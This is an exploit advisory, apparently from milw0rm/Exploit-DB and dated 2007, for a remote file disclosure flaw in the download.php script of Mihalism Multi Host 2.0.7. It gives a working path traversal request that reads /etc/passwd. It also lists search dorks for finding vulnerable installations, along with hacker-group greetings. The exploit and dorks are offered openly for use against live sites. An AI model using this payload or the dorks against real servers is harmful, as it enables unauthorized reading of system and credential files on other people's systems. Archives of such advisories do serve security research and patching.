Mihalism Multi Host 2.0.7 - 'download.php' Remote File Disclosure

EDB-ID:

4812


Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2007-12-30


    ########                  ######              ####                ######  ######
  ##      ##                    ##                  ##                  ####  ####  
  ##              ######        ##            ####  ##                  ####  ####  
  ##            ##      ##      ##          ##    ####                  ##  ##  ##  
  ##    ######  ##      ##      ##    ##    ##      ##                  ##      ##  
  ##      ##    ##      ##      ##    ##    ##      ##                  ##      ##  
    ######        ######      ##########      ##########              ######  ######
                                                        ##############              

####################################################################################
###### Mihalism Multi Host v2.0.7 download.php Remote File Disclosure Vuln     #####
###### Script Page :  :(                                                       #####
###### POC :                                                                   #####
###### /Script/download.php?file=../../../../../../../../../../../etc/passwd   #####
###### D0rkS :                                                                 #####
###### Powered by Mihalism Multi Host v2.0.7                                   #####
###### Powered by Mihalism Multi Host v2.0.5                                   #####
###### Powered by Mihalism Multi Host v2.0.4                                   #####
###### Powered by Mihalism Multi Host v2.0.3 MBF                               #####
###### Powered by Mihalism Multi Host v3.1.1 Final                             #####
###### GREETZ TO :                                                             #####
###### TrYaG-TeaM , H-T Team , RoMaNcYxHaCkEr , Asb-May's Team & ALL           #####
####################################################################################

# milw0rm.com [2007-12-30]